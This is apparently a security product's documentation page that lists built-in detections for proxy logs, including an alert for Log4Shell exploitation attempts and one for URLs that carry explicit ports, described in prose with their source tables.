Proxy detections

A proxy server is a system or router that provides gateway between users and the internet. As a result, to helps organizations prevent cyber attacks from entire a private network as the server is an intermediary, isolating the internal network from the internet and attackers. Proxies provide a valuable layer of security in general and an important data source to analyze web traffic going to and from your organization. Monitoring the proxy data can help pinpoint attacks, show malicious behavior, and give more context to what entities are doing within your organization. The below list of out-of-the-box detections provide commonly seen use cases for potentially malicious activity through proxy logs.

This search looks for Collective Defense matches in proxy data.

Source table → proxy.all.access

This search looks for Collective Defense matches in proxy data.

Source table → proxy.all.access

This search looks for Collective Defense matches in proxy data.

Source table → proxy.all.access

Alert that checks attempts of exploiting CVE-2021-44228 known as Log4shell. The query looks for payload patterns associated with this vulnerability on the log raw message. This would include payloads included in the url, user-agent header, referer header or POST and PUT HTTP bodies. [WARNING] This alert detects attack patterns and can generate a high volume of events due to the number of scanners currently testing systems on the Internet. It is therefore likely to need some kind of tunning.

Source table → cloud.azure

During the normal navigation of a user or system, the URLs do not include the destination port. The use of the port can become suspicious behavior in combination with other factors.

Source table → proxy.all.access